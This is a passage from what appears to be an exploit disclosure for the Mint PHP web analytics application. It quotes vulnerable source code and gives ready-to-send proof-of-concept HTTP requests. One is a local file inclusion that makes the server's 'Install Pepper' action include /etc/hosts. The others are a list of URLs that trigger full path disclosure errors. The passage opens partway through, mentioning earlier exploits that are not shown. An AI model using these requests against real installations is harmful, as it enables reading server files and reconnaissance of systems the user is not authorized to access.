LFI Requies access to preferences(can be obtained by using first or second exploit)
Vulnerable Code:
Код:
mint.php:
function installPepper($pathToPepper)
{
include_once(MINT_ROOT.$pathToPepper);
...
\app\paths\preferences\index.php:
if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences')
...
switch($_POST['action'])
...
case 'Install Pepper':
$Mint->tmp['pageTitle'] = 'Install Pepper';
$Mint->installPepper($_POST['src']);
POC:
Код:
POST http://***/ HTTP/1.0
Host: ***.com
UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 58
MintPath=Preferences&action=Install Pepper&src=/etc/hosts&
4. Multiple Full Path Disclosure
Vulnerable Code:
Код:
if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file
POC:
Код:
GET http://localhost/mint/app/includes/foot.php?benchmark
GET http://localhost/mint/app/includes/foot.php?observe
GET http://localhost/mint/app/paths/auth/index.php
GET http://localhost/mint/app/paths/custom/index.php?custom
GET http://localhost/mint/app/paths/custom/index.php?RSS
GET http://localhost/mint/app/paths/display/display.php
GET http://localhost/mint/app/paths/display/index.php?tab
GET http://localhost/mint/app/paths/errors/index.php
GET http://localhost/mint/app/paths/feedback/index.php
GET http://localhost/mint/app/paths/install/configuration.php
GET http://localhost/mint/app/paths/install/instructions.php
POST http://localhost/mint/app/paths/install/index.php | action=Activate
POST http://localhost/mint/app/paths/install/index.php | action=Accept
POST http://localhost/mint/app/paths/install/index.php | action=Configure
and etc